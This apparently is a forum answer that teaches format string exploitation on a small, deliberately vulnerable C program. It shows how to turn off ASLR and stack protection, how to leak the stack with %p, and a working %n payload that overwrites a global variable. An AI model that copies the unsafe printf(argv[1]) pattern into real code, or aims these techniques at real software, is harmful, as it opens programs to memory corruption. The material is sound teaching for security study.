Assume I have the following code:
#include
#include
#include
int num1 = 0;
int main(int argc, char **argv)
First of all I recommend that you read the book Hacking: The Art of Exploitation
. It is very good.
Now I try to explain how you can exploit your program. I assume that you know some basics about Format String Exploits, so I don't have to start from the very beginning. However it is important to disable ASLR and compile the executable without stack protection.
# disable ASLR
@> echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# compile without stack protection
@> gcc -g -fno-stack-protector -z execstack fmt.c
I modified your program a little bit, so it is easier to understand how the exploit works:
#include <stdio.h>
int num1 = 0xdead;
int main(int argc, char **argv){
int num2 = 0xbeef;
int *ptr = &num1;
printf(argv[1]);
if (num1 == 0xabc){
printf("Well done");
}
if(num2 == 0xdef)
printf("You are a format string expert");
printf("\n[DEBUG] num1: 0x%x [%p] num2: 0x%x [%p]\n", num1, &num1, num2, &num2);
return 0;
}
I am using a 64-Bit Ubunty System. The pointer size is 8 bytes.
The Exploit
variable num1
First we try to change the variable num1
. The address of num1
is stored in ptr
. ptr
is a local variable in main, so it is put on the stack (type int*). To examine the stack we can use the %p
format specifier.
@> ./a.out %p.%p.%p.%p.%p.%p.%p.%p.%p
Output:
0x7fffffffdf78.0x7fffffffdf90.(nil).0x7ffff7dd4e80.0x7ffff7dea560.0x7fffffffdf78.0x200400440.0xbeefffffdf70.0x601040
[DEBUG] num1: 0xdead [0x601040] num2: 0xbeef [0x7fffffffde84]
We can see that the 9th element has the value 0x601040
. That is the same like the value in our debug message num1: 0xdead [0x601040]
. Now we know that 0x601040
is the pointer to the variable num1 and it is located on the stack. To change that value (write in memory) we can use the %n
format specifier in combination with the Direct Parameter Access %9$n
to write to the address that is stored in the 9th stack position.
To gain access to the Well done message we only need to write 0xabc
values to stdout and use %n
to write that number in memory:
@> ./a.out `python -c "print('A' * 0xabc)"`%9\$n
I use python to generate that output. Now the program prints "Well done".
variable num2
If we take a close look to the output we see that the 8th element has the value beef
. That is our variable num2
. I still did not figure out, how to exploit num2
but I try to explain how to do it in theory.
We want to put an arbitrary memory address on the stack. This address should be the address that points to num2 (0x7fffffffde84
). After that we can use the %n
parameter to write to that address. To put an address on the stack we can use the format string.
@> ./a.out `printf "\x08\x07\x06\x05\x04\x03\x02\x01"`
The problem is that we have to find the location of this format string on the stack.
@> ./a.out AAAA`printf "\x08\x07\x06\x05\x04\x03\x02\x01"`BBBB`python -c "print('%p.' * 200)"`
The 'A's and 'B's are just padding and it is also easier to find our address in the output. The exploit looks similar to the num1 exploit way:
@> ./a.out ADDRESS`python -c "print('A' * VAL_TO_WRITE)"`PADDING%LOCATION_OF_ADDRESS\$n
The problem: In our scenario the address of num2
is 0x7fffffffde84
(that is 0x00007fffffffde84
). That address can not be written because 0x00 is the C-String Terminator. So we can not put the address in our format string.